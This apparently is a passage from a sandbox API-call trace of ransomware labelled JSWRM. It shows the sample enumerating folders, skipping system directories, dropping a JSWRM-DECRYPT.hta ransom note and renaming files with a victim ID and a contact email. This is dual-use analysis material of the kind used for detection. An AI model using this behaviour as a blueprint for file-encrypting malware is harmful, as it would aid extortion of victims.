(HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.748] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10077367668300064) returned 0 [0067.748] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.748] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.748] CloseHandle (hObject=0xffffffff) returned 1 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0067.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0067.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0067.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.749] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.749] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.749] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="en-GB", cAlternateFileName="")) returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2=".") returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="..") returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="...") returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="windows") returned -1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="recovery") returned -1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="perflogs") returned -1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="documents and settings") returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="$RECYCLE.BIN") returned 1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="system volume information") returned -1 [0067.749] lstrcmpiW (lpString1="en-GB", lpString2="msocache") returned -1 [0067.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0067.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\jswrm-decrypt.hta")) returned 0xffffffff [0067.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.750] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.750] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.752] CloseHandle (hObject=0x454) returned 1 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0067.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\jswrm-decrypt.hta")) returned 0x20 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0067.752] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0067.753] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.753] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.753] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.753] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.753] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f0aace0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f0aace0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0067.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0067.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.753] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.753] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.753] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.754] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0067.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.821] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10084583213357176) returned 0 [0067.821] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.821] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.821] CloseHandle (hObject=0xffffffff) returned 1 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0067.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0067.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0067.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.822] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.822] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.822] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="en-US", cAlternateFileName="")) returned 1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0067.822] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0067.822] lstrcmpiW (lpString1="en-US", 